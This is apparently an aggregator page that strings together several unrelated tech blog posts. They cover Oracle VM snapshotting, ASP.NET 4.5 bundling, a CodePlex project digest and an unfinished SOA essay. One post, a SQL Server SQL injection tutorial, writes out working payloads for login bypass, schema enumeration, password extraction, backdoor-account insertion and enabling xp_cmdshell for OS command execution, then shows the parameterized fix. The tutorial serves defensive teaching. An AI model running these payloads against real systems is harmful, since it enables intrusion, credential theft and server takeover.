and changed the listening address to the new hostname: (ADDRESS = (PROTOCOL = TCP)(HOST = vboxdb.oracle.com)(PORT = 1521)) After changing the listener.ora I was able to start the listener using: lsnrctl start I also had to reconfigure the EM database control. I first deconfigured it using the command: emca -deconfig dbcontrol db -repos drop This drops the repository and removes any existing registered dbcontrols. I then re-configured it using the following command: emca -config dbcontrol db -repos create This creates the EM repository and then configures and starts dbcontrol. Now my database machine is ready so I can close it down and take a snapshot. Disabling the Database on the FMW Machine I set up the database to start automatically by creating a service called “dbora”. On the FMW machine I do not need the database running so I can prevent it auto-starting by running the following command: chkconfig –del dbora Note that because I am using a snapshot it is not a waste of disk space to have the DB installed but not used. As long as I don’t run it, it won’t cost me anything. I can now close the FMW machine down and take a snapshot. Creating a New Domain The FMW machine is now ready to create a new domain. When creating the domain I can point it at the second machine which is running the database. I can potentially run these machines on two separate physical machines as long as I have the original virtual machine available to both of the physical machines. Gotchas in Snapshotting VirtualBox does not support the concept of linked machines in a network like some virtualization technologies so when creating a snapshot it is a good idea to shut both VMs down and then take a snapshot on both of them. This is because we want to keep the database in sync with the middleware. One way to make sure that this happens would be to place all the domain configuration files on the database server via an NFS share, this would mean that all we would need to snapshot would be the database machine because that would hold all the state and configuration. The Sky’s the Limit We have covered a simple case of having just two machines. I have a more complicated configuration in which two machine run a RAC database off the same base OS image, and two more machines run a SOA cluster based on the same OS image. Just remember what machine holds state and what are the consequences of taking a snapshot.

Read the article
New Bundling and Minification Support (ASP.NET 4.5 Series)

- by ScottGu

This is the sixth in a series of blog posts I'm doing on ASP.NET 4.5. The next release of .NET and Visual Studio include a ton of great new features and capabilities. With ASP.NET 4.5 you'll see a bunch of really nice improvements with both Web Forms and MVC - as well as in the core ASP.NET base foundation that both are built upon. Today’s post covers some of the work we are doing to add built-in support for bundling and minification into ASP.NET - which makes it easy to improve the performance of applications. This feature can be used by all ASP.NET applications, including both ASP.NET MVC and ASP.NET Web Forms solutions. Basics of Bundling and Minification As more and more people use mobile devices to surf the web, it is becoming increasingly important that the websites and apps we build perform well with them. We’ve all tried loading sites on our smartphones – only to eventually give up in frustration as it loads slowly over a slow cellular network. If your site/app loads slowly like that, you are likely losing potential customers because of bad performance. Even with powerful desktop machines, the load time of your site and perceived performance can make an enormous customer perception. Most websites today are made up of multiple JavaScript and CSS files to separate the concerns and keep the code base tight. While this is a good practice from a coding point of view, it often has some unfortunate consequences for the overall performance of the website. Multiple JavaScript and CSS files require multiple HTTP requests from a browser – which in turn can slow down the performance load time. Simple Example Below I’ve opened a local website in IE9 and recorded the network traffic using IE’s built-in F12 developer tools. As shown below, the website consists of 5 CSS and 4 JavaScript files which the browser has to download. Each file is currently requested separately by the browser and returned by the server, and the process can take a significant amount of time proportional to the number of files in question. Bundling ASP.NET is adding a feature that makes it easy to “bundle” or “combine” multiple CSS and JavaScript files into fewer HTTP requests. This causes the browser to request a lot fewer files and in turn reduces the time it takes to fetch them. Below is an updated version of the above sample that takes advantage of this new bundling functionality (making only one request for the JavaScript and one request for the CSS): The browser now has to send fewer requests to the server. The content of the individual files have been bundled/combined into the same response, but the content of the files remains the same - so the overall file size is exactly the same as before the bundling. But notice how even on a local dev machine (where the network latency between the browser and server is minimal), the act of bundling the CSS and JavaScript files together still manages to reduce the overall page load time by almost 20%. Over a slow network the performance improvement would be even better. Minification The next release of ASP.NET is also adding a new feature that makes it easy to reduce or “minify” the download size of the content as well. This is a process that removes whitespace, comments and other unneeded characters from both CSS and JavaScript. The result is smaller files, which will download and load in a browser faster. The graph below shows the performance gain we are seeing when both bundling and minification are used together: Even on my local dev box (where the network latency is minimal), we now have a 40% performance improvement from where we originally started. On slow networks (and especially with international customers), the gains would be even more significant. Using Bundling and Minification inside ASP.NET The upcoming release of ASP.NET makes it really easy to take advantage of bundling and minification within projects and see performance gains like in the scenario above. The way it does this allows you to avoid having to run custom tools as part of your build process – instead ASP.NET has added runtime support to perform the bundling/minification for you dynamically (caching the results to make sure perf is great). This enables a really clean development experience and makes it super easy to start to take advantage of these new features. Let’s assume that we have a simple project that has 4 JavaScript files and 6 CSS files: Bundling and Minifying the .css files Let’s say you wanted to reference all of the stylesheets in the “Styles” folder above on a page. Today you’d have to add multiple CSS references to get all of them – which would translate into 6 separate HTTP requests: The new bundling/minification feature now allows you to instead bundle and minify all of the .css files in the Styles folder – simply by sending a URL request to the folder (in this case “styles”) with an appended “/css” path after it. For example: This will cause ASP.NET to scan the directory, bundle and minify the .css files within it, and send back a single HTTP response with all of the CSS content to the browser. You don’t need to run any tools or pre-processor to get this behavior. This enables you to cleanly separate your CSS into separate logical .css files and maintain a very clean development experience – while not taking a performance hit at runtime for doing so. The Visual Studio designer will also honor the new bundling/minification logic as well – so you’ll still get a WYSWIYG designer experience inside VS as well. Bundling and Minifying the JavaScript files Like the CSS approach above, if we wanted to bundle and minify all of our JavaScript into a single response we could send a URL request to the folder (in this case “scripts”) with an appended “/js” path after it: This will cause ASP.NET to scan the directory, bundle and minify the .js files within it, and send back a single HTTP response with all of the JavaScript content to the browser. Again – no custom tools or builds steps were required in order to get this behavior. And it works with all browsers. Ordering of Files within a Bundle By default, when files are bundled by ASP.NET they are sorted alphabetically first, just like they are shown in Solution Explorer. Then they are automatically shifted around so that known libraries and their custom extensions such as jQuery, MooTools and Dojo are loaded before anything else. So the default order for the merged bundling of the Scripts folder as shown above will be: Jquery-1.6.2.js Jquery-ui.js Jquery.tools.js a.js By default, CSS files are also sorted alphabetically and then shifted around so that reset.css and normalize.css (if they are there) will go before any other file. So the default sorting of the bundling of the Styles folder as shown above will be: reset.css content.css forms.css globals.css menu.css styles.css The sorting is fully customizable, though, and can easily be changed to accommodate most use cases and any common naming pattern you prefer. The goal with the out of the box experience, though, is to have smart defaults that you can just use and be successful with. Any number of directories/sub-directories supported In the example above we just had a single “Scripts” and “Styles” folder for our application. This works for some application types (e.g. single page applications). Often, though, you’ll want to have multiple CSS/JS bundles within your application – for example: a “common” bundle that has core JS and CSS files that all pages use, and then page specific or section specific files that are not used globally. You can use the bundling/minification support across any number of directories or sub-directories in your project – this makes it easy to structure your code so as to maximize the bunding/minification benefits. Each directory by default can be accessed as a separate URL addressable bundle. Bundling/Minification Extensibility ASP.NET’s bundling and minification support is built with extensibility in mind and every part of the process can be extended or replaced. Custom Rules In addition to enabling the out of the box - directory-based - bundling approach, ASP.NET also supports the ability to register custom bundles using a new programmatic API we are exposing. The below code demonstrates how you can register a “customscript” bundle using code within an application’s Global.asax class. The API allows you to add/remove/filter files that go into the bundle on a very granular level: The above custom bundle can then be referenced anywhere within the application using the below <script> reference: Custom Processing You can also override the default CSS and JavaScript bundles to support your own custom processing of the bundled files (for example: custom minification rules, support for Saas, LESS or Coffeescript syntax, etc). In the example below we are indicating that we want to replace the built-in minification transforms with a custom MyJsTransform and MyCssTransform class. They both subclass the CSS and JavaScript minifier respectively and can add extra functionality: The end result of this extensibility is that you can plug-into the bundling/minification logic at a deep level and do some pretty cool things with it. 2 Minute Video of Bundling and Minification in Action Mads Kristensen has a great 90 second video that shows off using the new Bundling and Minification feature. You can watch the 90 second video here. Summary The new bundling and minification support within the next release of ASP.NET will make it easier to build fast web applications. It is really easy to use, and doesn’t require major changes to your existing dev workflow. It is also supports a rich extensibility API that enables you to customize it however you want. You can easily take advantage of this new support within ASP.NET MVC, ASP.NET Web Forms and ASP.NET Web Pages based applications. Hope this helps, Scott P.S. In addition to blogging, I use Twitter to-do quick posts and share links. My Twitter handle is: @scottgu

Read the article
SQL Server SQL Injection from start to end

- by Mladen Prajdic

SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

Read the article
CodePlex Daily Summary for Friday, January 07, 2011

CodePlex Daily Summary for Friday, January 07, 2011Popular ReleasesAutoLoL: AutoLoL v1.5.2: Implemented the Auto Updater Fix: Your settings will no longer be cleared with new releases of AutoLoL The mastery Editor and Browser now have their own tabs instead of nested tabs The Browser tab will only show the masteries matching ALL filters instead of just one Added a 'Browse' button in the Mastery Editor tab to open the Masteries Directory The Browser tab now shows a message when there are no mastery files in the Masteries Directory Fix: Fixed the Save As dialog again, for ...Ionics Isapi Rewrite Filter: 2.1 latest stable: V2.1 is stable, and is in maintenance mode. This is v2.1.1.25. It is a bug-fix release. There are no new features. 28629 29172 28722 27626 28074 29164 27659 27900 many documentation updates and fixes proper x64 build environment. This release includes x64 binaries in zip form, but no x64 MSI file. You'll have to manually install x64 servers, following the instructions in the documentation.StyleCop for ReSharper: StyleCop for ReSharper 5.1.14980.000: A considerable amount of work has gone into this release: Huge focus on performance around the violation scanning subsystem: - caching added to reduce IO operations around reading and merging of settings files - caching added to reduce creation of expensive objects Users should notice condsiderable perf boost and a decrease in memory usage. Bug Fixes: - StyleCop's new ObjectBasedEnvironment object does not resolve the StyleCop installation path, thus it does not return the correct path ...VivoSocial: VivoSocial 7.4.1: New release with bug fixes and updates for performance.SSH.NET Library: 2011.1.6: Fixes CommandTimeout default value is fixed to infinite. Port Forwarding feature improvements Memory leaks fixes New Features Add ErrorOccurred event to handle errors that occurred on different thread New and improve SFTP features SftpFile now has more attributes and some operations Most standard operations now available Allow specify encoding for command execution KeyboardInteractiveConnectionInfo class added for "keyboard-interactive" authentication. Add ability to specify bo....NET Extensions - Extension Methods Library for C# and VB.NET: Release 2011.03: Added lot's of new extensions and new projects for MVC and Entity Framework. object.FindTypeByRecursion Int32.InRange String.RemoveAllSpecialCharacters String.IsEmptyOrWhiteSpace String.IsNotEmptyOrWhiteSpace String.IfEmptyOrWhiteSpace String.ToUpperFirstLetter String.GetBytes String.ToTitleCase String.ToPlural DateTime.GetDaysInYear DateTime.GetPeriodOfDay IEnumberable.RemoveAll IEnumberable.Distinct ICollection.RemoveAll IList.Join IList.Match IList.Cast Array.IsNullOrEmpty Array.W...VidCoder: 0.8.0: Added x64 version. Made the audio output preview more detailed and accurate. If the chosen encoder or mixdown is incompatible with the source, the fallback that will be used is displayed. Added "Auto" to the audio mixdown choices. Reworked non-anamorphic size calculation to work better with non-standard pixel aspect ratios and cropping. Reworked Custom anamorphic to be more intuitive and allow display width to be set automatically (Thanks, Statick). Allowing higher bitrates for 6-ch....NET Voice Recorder: Auto-Tune Release: This is the source code and binaries to accompany the article on the Coding 4 Fun website. It is the Auto Tuner release of the .NET Voice Recorder application.BloodSim: BloodSim - 1.3.2.0: - Simulation Log is now automatically disabled and hidden when running 10 or more iterations - Hit and Expertise are now entered by Rating, and include option for a Racial Expertise bonus - Added option for boss to use a periodic magic ability (Dragon Breath) - Added option for boss to periodically Enrage, gaining a Damage/Attack Speed buffASP.NET MVC CMS ( Using CommonLibrary.NET ): CommonLibrary.NET CMS 0.9.5 Alpha: CommonLibrary CMSA simple yet powerful CMS system in ASP.NET MVC 2 using C# 4.0. ActiveRecord based components for Blogs, Widgets, Pages, Parts, Events, Feedback, BlogRolls, Links Includes several widgets ( tag cloud, archives, recent, user cloud, links twitter, blog roll and more ) Built using the http://commonlibrarynet.codeplex.com framework. ( Uses TDD, DDD, Models/Entities, Code Generation ) Can run w/ In-Memory Repositories or Sql Server Database See Documentation tab for Ins...AllNewsManager.NET: AllNewsManager.NET 1.2.1: AllNewsManager.NET 1.2.1 It is a minor update from version 1.2EnhSim: EnhSim 2.2.9 BETA: 2.2.9 BETAThis release supports WoW patch 4.03a at level 85 To use this release, you must have the Microsoft Visual C++ 2010 Redistributable Package installed. This can be downloaded from http://www.microsoft.com/downloads/en/details.aspx?FamilyID=A7B7A05E-6DE6-4D3A-A423-37BF0912DB84 To use the GUI you must have the .NET 4.0 Framework installed. This can be downloaded from http://www.microsoft.com/downloads/en/details.aspx?FamilyID=9cfb2d51-5ff4-4491-b0e5-b386f32c0992 - Added in the Gobl...xUnit.net - Unit Testing for .NET: xUnit.net 1.7 Beta: xUnit.net release 1.7 betaBuild #1533 Important notes for Resharper users: Resharper support has been moved to the xUnit.net Contrib project. Important note for TestDriven.net users: If you are having issues running xUnit.net tests in TestDriven.net, especially on 64-bit Windows, we strongly recommend you upgrade to TD.NET version 3.0 or later. This release adds the following new features: Added support for ASP.NET MVC 3 Added Assert.Equal(double expected, double actual, int precision)...Json.NET: Json.NET 4.0 Release 1: New feature - Added Windows Phone 7 project New feature - Added dynamic support to LINQ to JSON New feature - Added dynamic support to serializer New feature - Added INotifyCollectionChanged to JContainer in .NET 4 build New feature - Added ReadAsDateTimeOffset to JsonReader New feature - Added ReadAsDecimal to JsonReader New feature - Added covariance to IJEnumerable type parameter New feature - Added XmlSerializer style Specified property support New feature - Added ...DbDocument: DbDoc Initial Version: DbDoc Initial versionASP .NET MVC CMS (Content Management System): Atomic CMS 2.1.2: Atomic CMS 2.1.2 release notes Atomic CMS installation guide N2 CMS: 2.1: N2 is a lightweight CMS framework for ASP.NET. It helps you build great web sites that anyone can update. Major Changes Support for auto-implemented properties ({get;set;}, based on contribution by And Poulsen) All-round improvements and bugfixes File manager improvements (multiple file upload, resize images to fit) New image gallery Infinite scroll paging on news Content templates First time with N2? Try the demo site Download one of the template packs (above) and open the proj...Mobile Device Detection and Redirection: 0.1.11.10: IMPORTANT CHANGESThis release changes the way some WURFL capabilities and attributes are exposed to .NET developers. If you cast MobileCapabilities to return some values then please read the Release Note before implementing this release. The following code snippet can be used to access any WURFL capability. For instance, if the device is a tablet: string capability = Request.Browser["is_tablet"]; SummaryNew attributes have been added to the redirect section: originalUrlAsQueryString If se...Wii Backup Fusion: Wii Backup Fusion 1.0: - Norwegian translation - French translation - German translation - WBFS dump for analysis - Scalable full HQ cover - Support for log file - Load game images improved - Support for image splitting - Diff for images after transfer - Support for scrubbing modes - Search functionality for log - Recurse depth for Files/Load - Show progress while downloading game cover - Supports more databases for cover download - Game cover loading routines improvedBlogEngine.NET: BlogEngine.NET 2.0: Get DotNetBlogEngine for 3 Months Free! Click Here for More Info 3 Months FREE – BlogEngine.NET Hosting – Click Here! If you want to set up and start using BlogEngine.NET right away, you should download the Web project. If you want to extend or modify BlogEngine.NET, you should download the source code. If you are upgrading from a previous version of BlogEngine.NET, please take a look at the Upgrading to BlogEngine.NET 2.0 instructions. To get started, be sure to check out our installatio...New Projects9192631770: This project is created for learning .net 3.5 personally. However it may not suffice for anyone to give a start point. (9192631770) is equivalent to 1 sec in atomic clock.AGS: AGSAll-In-One Code Framework Prerelease: All-In-One Code Framework PrereleaseAwait Events with "yield": This is a library that allows you to stop running the code wherever you want in order to await an event using the functionality of "yield" sentence. It's useful when you want to await asynchronous events or when you have to deal with many events in a sequential way.Battle.net SDK: This is a SDK that retrieves it's information from the Battle.Net community site. At the moment blizzard only supports this for World of Warcraft, so that's what our main aim is at the momeen.t C++ Hash Container Benchmark: C++ Hash Container Benchmark for STL map, C++0x unordered map, Boost unordered map, ATL map and ATL hash map for STL wide string and ATL CString.Colour Lovers .NET: A .NET library for the Colour Lovers API.DatingGame: Course to teach high-school aged girls basic T-SQL using a fun scenario - querying to find the hottest boys! Used at Microsoft DigiGirlz and TKP events. Included DDL script, CSV for bcp with data, PPTX, T-SQL Cheat Sheet and teaching tips. Enjoy!do-Dots open .NET SDK: The do-Dots open SDK brings developers a full set of classes that allow to build applications based on do-Dots, a framework for M2M communication. It's developed in C#. EFMVC - ASP.NET MVC 3 and EF Code First: Demo web app using ASP.NET MVC 3 and EF Code FirstGS1: D is a 2D game demo written in C++ and using an API : HAPI for the graphic part and the audio part. All the xml files are handled with tinyXML. It is a vertical scrolling shoot'em up where the player controls a dragon flying in Central Park.GS2: In Zombies, you are a wizard, the most powerful wizard in the world, and two days ago, the Devil forces began to attack our world. The only person capable of stopping them is you, this is why the Devil himself came to you and took your powers. You're now alone, without any weaponIPProvider: DFGiwtfly: ????iwtfly26050: iwtfly2Knowledge Exchange .Net: This is my learning experience with creating an enterprise scale .NET application with tools such as Tortoise SVN, NANT, and Linq to SQLLinqPad Data Context Driver for SharePoint: The SharePoint Data Context Driver for LinqPad makes it easer for SharePoint 2010 Developers to develop, maintain and just play around with Linq To SharePoint statements via LinqPad. It is developed in C# and enables SharePoint 2010 Support to LinqPad.MaxLeafWebSiteK3: MaxLeafWebSiteK3Open ASP.NET CMS: Open ASP.NET 3.5 CMS Plug 'N Play Settings Manager: Plug 'N Play Settings Manager will be an application to configure settings on a windows computer by waiting for a usb thumbstick with a configuration file to be inserted, the application would then read and apply those settings. The early focus will be applying network settings.project windy: Windy - enhanced window manager. windy does window management a breeze. It started as a windows alternative to divvy, but now it has evolved with into its own. Thanks to the generous feedback from you folks. whats different from divvy? - first - its free. - has divvy likeRiaMVVM : MVVM Friendly WCF Ria Services: Simple, light-weight, MVVM friendly access to WCF Ria Services. Written in C# for use with Silverlight 4.SharePoint Designer 2007 Policy: Enable or Disable SharePoint Designer 2007 per site web application and per site colleciton. Spruckus - SharePoint ReUsable Content Keystamp Usage Search: Adds a keystamp to all html type items in the SharePoint Reusable Content list and adds a context item to the reusable content list that will find usages of that reusable content in your site using search.Student Insiders: Student InsidersTea: Tea Web Operator SystemVegas.NET: Projeto teste de TransportadoraXNA 4 Game state management system: XNA 4 Game State Management??????: aa

Read the article
Managed Service Architectures Part I

- by barryoreilly

Instead of thinking about service oriented architecture, a concept that is continually defined, redefined, abused and mistreated, perhaps it is time to drop the acronym and consider what we actually need to get the job done. ‘Pure’ SOA involves the modeling of an organisation’s processes, the so called ‘Top Down’ approach, followed by the implementation of these processes as services. Another approach, more commonly seen in the wild, is the bottom up approach. This usually involves services that simply start popping up in the organization, and SOA in this case is often just an attempt to rein in these services. Such projects, although described as SOA projects for a variety of reasons, have clearly little relation to process driven architecture. Much has been written about these two approaches, with many deciding that a hybrid of both methods is needed to succeed with SOA. These hybrid methods are a sensible compromise, but one gets the feeling that there is too much focus on ‘Succeeding with SOA’. Organisations who focus too much on bottom up development, or who waste too much time and money on top down approaches that don’t produce results, are often recommended to attempt an ‘agile’(Erl) or ‘middle-out’ (Microsoft) approach in order to succeed with SOA. The problem with recommending this approach is that, in most cases, succeeding with SOA isn’t the aim of the project. If a project is started with the simple aim of ‘Succeeding with SOA’ then the reasons for the projects existence probably need to be questioned. There are a number of things we can be sure of: · An organisation will have a number of disparate IT systems · Some of these systems will have redundant data and functionality · Integration will give considerable ROI · Integration will already be under way. · Services will already exist in the organisation · These services will be inconsistent in their implementation and in their governance So there are three goals here: 1. Alignment between the business and IT 2. Integration of disparate systems 3. Management of services. 2 and 3 are going to happen, in fact they must happen if any degree of return is expected from the IT department. Ignoring 1 is considered a typical mistake in SOA implementations, as it ignores the business implications. However, the business implication of this approach is the money saved in more efficient IT processes. 2 and 3 are ongoing, and they will continue happening, even if a large project to produce a SOA metamodel is started. The result will then be an unstructured cackle of services, and a metamodel that is already going out of date. So we get stuck in and rebuild our services so that they match the metamodel, with the far reaching consequences that this will have on all our LOB systems are current. Lets imagine that this actually works ( how often do we rip and replace working software because it doesn't fit a certain pattern? Never -that's the point of integration), we will now be working with a metamodel that is out of date, and most likely incomplete if the organisation is large. Accepting that an object can have more than one model over time, with perhaps more than one model being at any given time will help us realise the limitations of the top down model. It is entirely normal , and perhaps necessary, for an organisation to be able to view an entity from different perspectives. So, instead of trying to constantly force these goals in a straight line, why not let them happen in parallel, and manage the changes in each layer. If company A has chosen to model their business processes and create a business architecture, there will be a reason behind this. Often the aim is to make the business more flexible and able to cope with change, through alignment between the business and the IT department. If company B’s IT department recognizes the problem of wild services springing up everywhere, and decides to do something about it, by designing a platform and processes for the introduction of services, is this not a valid approach? With the hybrid approach, it is recommended that company A begin deploying services as quickly as possible. Based on models that are clearly incomplete, and which will therefore change rapidly and often in the near future. Natural business evolution will also mean that the models can be guaranteed to change in the not so near future. To ‘Succeed with SOA’ Company B needs to go back to the drawing board and start modeling processes and objects. So, in effect, we are telling business analysts to start developing code based on a model they are unsure of, and telling programmers to ignore the obvious and growing problems in their IT department and start drawing lines and boxes. Could the problem be that there are two different problem domains? And the whole concept of SOA as it being described by clever salespeople today creates an example of oft dreaded ‘tight coupling’ between these two domains? Could it be that we have taken two large problem areas, and bundled the solution together in order to create a magic bullet? And then convinced ourselves that the bullet actually exists? Company A wants to have a closer relationship between the business and its IT department, in order to become a more flexible organization. Company B wants to decrease the maintenance costs of its IT infrastructure. If both companies focus on succeeding with SOA, then they aren’t focusing on their actual goals. If Company A starts building services from incomplete models, without a gameplan, they will end up 